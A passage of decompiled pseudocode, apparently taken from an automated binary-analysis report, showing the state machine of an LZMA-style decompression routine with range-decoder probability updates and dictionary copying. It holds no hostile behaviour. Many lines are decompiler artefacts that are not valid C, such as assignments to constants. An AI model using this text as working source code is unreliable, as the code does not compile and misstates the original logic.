											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
